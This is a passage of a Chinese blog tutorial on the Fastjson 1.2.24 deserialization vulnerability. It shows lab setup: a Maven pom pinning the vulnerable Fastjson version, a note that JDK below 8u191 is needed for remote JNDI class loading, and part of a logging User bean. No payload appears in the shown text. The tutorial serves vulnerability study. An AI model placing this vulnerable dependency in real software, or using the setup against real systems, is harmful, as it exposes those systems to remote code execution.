<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"/><meta name="theme-color" content="#222"/><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"/><meta name="renderer" content="webkit"/><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"/><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"/><link rel="alternate" href="/rss.xml" title="朝闻道 夕死可矣" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="朝闻道 夕死可矣" type="application/atom+xml"><link rel="alternate" type="application/json" title="朝闻道 夕死可矣" href="https://lib0gus.github.io/feed.json"/><link rel="preconnect" href="https://s4.zstatic.net"/><link rel="preconnect" href="https://at.alicdn.com"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CFredericka%20the%20Great:400,400italic,700,700italic%7CNoto%20Serif%20JP:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CInconsolata:400,400italic,700,700italic&display=swap&subset=latin,latin-ext" media="none" onload="this.media&#x3D;&#39;all&#39;"><link rel="modulepreload" href="/js/siteInit.js"></link><link rel="modulepreload" href="/js/nyx-player-X6RTDFRC.js"></link><link rel="modulepreload" href="/js/copy-tex-IZMHKWEC.js"></link><link rel="modulepreload" href="/js/post-HWEJVK45.js"></link><link rel="modulepreload" href="/js/chunk-OAGLLRHQ.js"></link><link rel="modulepreload" href="/js/index.esm-4WN36CR4.js"></link><link rel="modulepreload" href="/js/chunk-RK7HQRIO.js"></link><link rel="modulepreload" href="/js/chunk-MUPCZ7YY.js"></link><link rel="stylesheet" href="/css/siteInit.css" media="none" onload="this.media&#x3D;&#39;all&#39;"></link><link rel="preload" href="../images/1.png" as="image" fetchpriority="high"><meta name="keywords" content="Java安全"/><meta name="description" content="记录学习日常，请犀利点评，指出我的错误"/><link rel="canonical" href="https://lib0gus.github.io/2026/03/29/Java%E5%AE%89%E5%85%A8%E4%B9%8BFastjson/"><link rel="stylesheet" href="/css/post.css?v=0.5.4"><link rel="stylesheet" href="/css/mermaid.css?v=0.5.4"><!-- 临时处理--><link rel="stylesheet" media="none" onload="this.media='all'" href="https://s4.zstatic.net/ajax/libs/KaTeX/0.16.9/katex.min.css"><title>Java安全之Fastjson</title><meta name="generator" content="Hexo 8.1.1"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="pagefind_mount"></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">Java安全之Fastjson</h1><div class="meta"><span class="item" title="创建时间：2026-03-29 14:58:59"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2026-03-29T14:58:59+08:00">2026-03-29</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>7.1k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>6 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">Lib0gus的博客</a></li></ul><ul class="right" id="rightNav"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><img src="../images/1.png" loading="eager" decoding="async" fetchpriority="high" alt="朝闻道 夕死可矣"></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemListElement itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span><i class="ic i-angle-right"></i><span class="current" itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/Java%E5%AE%89%E5%85%A8/" itemprop="item" rel="index" title="分类于Java安全"><span itemprop="name">Java安全<meta itemprop="position" content="0"/></span></a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" data-pagefind-body="data-pagefind-body" lang="zh-CN"><link itemprop="mainEntityOfPage" href="https://lib0gus.github.io/2026/03/29/Java%E5%AE%89%E5%85%A8%E4%B9%8BFastjson/"/><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/test.png"/><meta itemprop="name" content="Lib0gus的小屋"/><meta itemprop="description" content="技术分享 &amp; 生活记录, 记录学习日常，请犀利点评，指出我的错误"/></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="朝闻道 夕死可矣"/></span><div class="body md" itemprop="articleBody"><h1 id="fastjson是什么"><a class="anchor" href="#fastjson是什么">#</a> Fastjson是什么？</h1>
<p>Fastjson 是一个 Java 库，可以将 Java 对象转换为 JSON 格式，当然它也可以将 JSON 字符串转换为 Java 对象。</p>
<h2 id="fastjson的优缺点"><a class="anchor" href="#fastjson的优缺点">#</a> Fastjson的优缺点</h2>
<p>优点：1、速度快（从名字就可以看出来Fast）</p>
<p>2、API 极简，上手简单</p>
<p>3、强大的个性化序列化注解</p>
<p>4、支持复杂泛型、集合解析</p>
<p>5、阿里生态标配，老项目兼容性拉满</p>
<p>6、内存占用率低</p>
<p>缺点：</p>
<p>早期版本漏洞巨多</p>
<p>我们先来复现一下最早的版本漏洞</p>
<h1 id="fastjson-1224反序列化漏洞"><a class="anchor" href="#fastjson-1224反序列化漏洞">#</a> Fastjson 1.2.24反序列化漏洞</h1>
<h2 id="一-环境搭建"><a class="anchor" href="#一-环境搭建">#</a> 一、环境搭建</h2>
<h3 id="11依赖配置"><a class="anchor" href="#11依赖配置">#</a> 1.1依赖配置</h3>
<p>①环境要求：</p>
<p>FastJson 版本：1.2.24</p>
<p>JDK：java 8u102</p>
<p>java的版本必须要低</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-latex"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">这里必须用低版本 JDK</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">原因很关键：从 JDK 8u191 开始，Java 对 JNDI 远程类加载做了限制</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">（com.sun.jndi.rmi.object.trustURLCodebase 默认设为 false），</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">也就是说高版本 JDK 直接阻断了通过 RMI 加载远程恶意类这条路。</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">所以要复现这个漏洞，必须用 8u191 以下的版本。</span></span></code></pre>
<p>②搭建Maven项目</p>
<p><img loading="lazy" src="https://cdn.nlark.com/yuque/0/2026/png/39222866/1774689877369-d5ae36ee-01fa-49cc-9768-7f399d5d0c53.png" alt="" /></p>
<p>③添加Fastjson依赖</p>
<p>在pom.xml中添加依赖</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-xml"><span class="line"><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">dependencies</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">dependency</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">        </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">groupId</span><span style="color:#999999;--shiki-dark:#666666">></span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">com.alibaba</span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">groupId</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">        </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">artifactId</span><span style="color:#999999;--shiki-dark:#666666">></span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">fastjson</span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">artifactId</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">        </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">version</span><span style="color:#999999;--shiki-dark:#666666">></span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">1.2.24</span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">version</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">dependency</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">dependencies</span><span style="color:#999999;--shiki-dark:#666666">></span></span></code></pre>
<p>完整pom.xml可直接复制</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-xml"><span class="line"><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">?</span><span style="color:#1E754F;--shiki-dark:#4D9375">xml</span><span style="color:#B07D48;--shiki-dark:#BD976A"> version</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">=</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">1.0</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B07D48;--shiki-dark:#BD976A"> encoding</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">=</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">UTF-8</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">?</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">project</span><span style="color:#B07D48;--shiki-dark:#BD976A"> xmlns</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">=</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">http://maven.apache.org/POM/4.0.0</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">         xmlns</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#B07D48;--shiki-dark:#BD976A">xsi</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">=</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">http://www.w3.org/2001/XMLSchema-instance</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">         xsi</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#B07D48;--shiki-dark:#BD976A">schemaLocation</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">=</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">modelVersion</span><span style="color:#999999;--shiki-dark:#666666">></span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">4.0.0</span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">modelVersion</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">groupId</span><span style="color:#999999;--shiki-dark:#666666">></span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">com.example</span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">groupId</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">artifactId</span><span style="color:#999999;--shiki-dark:#666666">></span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">fastjsondemo</span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">artifactId</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">version</span><span style="color:#999999;--shiki-dark:#666666">></span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">1.0-SNAPSHOT</span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">version</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">dependencies</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">        </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">dependency</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">            </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">groupId</span><span style="color:#999999;--shiki-dark:#666666">></span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">com.alibaba</span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">groupId</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">            </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">artifactId</span><span style="color:#999999;--shiki-dark:#666666">></span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">fastjson</span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">artifactId</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">            </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">version</span><span style="color:#999999;--shiki-dark:#666666">></span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">1.2.24</span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">version</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">        </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">dependency</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">dependencies</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"></span>
<span class="line"></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">properties</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">        </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">maven.compiler.source</span><span style="color:#999999;--shiki-dark:#666666">></span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">8</span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">maven.compiler.source</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">        </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">maven.compiler.target</span><span style="color:#999999;--shiki-dark:#666666">></span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">8</span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">maven.compiler.target</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">        </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#1E754F;--shiki-dark:#4D9375">project.build.sourceEncoding</span><span style="color:#999999;--shiki-dark:#666666">></span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">UTF-8</span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">project.build.sourceEncoding</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">properties</span><span style="color:#999999;--shiki-dark:#666666">></span></span>
<span class="line"></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">&#x3C;</span><span style="color:#999999;--shiki-dark:#666666">/</span><span style="color:#1E754F;--shiki-dark:#4D9375">project</span><span style="color:#999999;--shiki-dark:#666666">></span></span></code></pre>
<p>添加后点击右上角下载依赖或直接使用本地仓库</p>
<p><img loading="lazy" src="https://cdn.nlark.com/yuque/0/2026/png/39222866/1774690055705-06792290-b886-45b6-9de7-90238b19bf29.png" alt="" /></p>
<h3 id="12-创建项目"><a class="anchor" href="#12-创建项目">#</a> 1.2 创建项目</h3>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-java"><span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">package</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> com</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">example</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">public</span><span style="color:#AB5959;--shiki-dark:#CB7676"> class</span><span style="color:#2E8F82;--shiki-dark:#5DA994"> User</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    private</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> String</span><span style="color:#B07D48;--shiki-dark:#BD976A"> name</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    private</span><span style="color:#AB5959;--shiki-dark:#CB7676"> int</span><span style="color:#B07D48;--shiki-dark:#BD976A"> age</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    private</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> String</span><span style="color:#B07D48;--shiki-dark:#BD976A"> sex</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    public</span><span style="color:#59873A;--shiki-dark:#80A665"> User</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    public</span><span style="color:#59873A;--shiki-dark:#80A665"> User</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">String </span><span style="color:#B07D48;--shiki-dark:#BD976A">name</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#AB5959;--shiki-dark:#CB7676"> int</span><span style="color:#B07D48;--shiki-dark:#BD976A"> age</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> String </span><span style="color:#B07D48;--shiki-dark:#BD976A">sex</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#A65E2B;--shiki-dark:#C99076">        this</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">name</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> name</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#A65E2B;--shiki-dark:#C99076">        this</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">age</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> age</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#A65E2B;--shiki-dark:#C99076">        this</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">sex</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> sex</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    public</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> String </span><span style="color:#59873A;--shiki-dark:#80A665">getName</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">        System</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">out</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">println</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">getName</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">        return</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> name</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    public</span><span style="color:#AB5959;--shiki-dark:#CB7676"> void</span><span style="color:#59873A;--shiki-dark:#80A665"> setName</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">String </span><span style="color:#B07D48;--shiki-dark:#BD976A">name</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#A65E2B;--shiki-dark:#C99076">        this</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">name</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> name</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">        System</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">out</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">println</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">setName</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    public</span><span style="color:#AB5959;--shiki-dark:#CB7676"> int</span><span style="color:#59873A;--shiki-dark:#80A665"> getAge</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">        System</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">out</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">println</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">getAge</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">        return</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> age</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"></span>
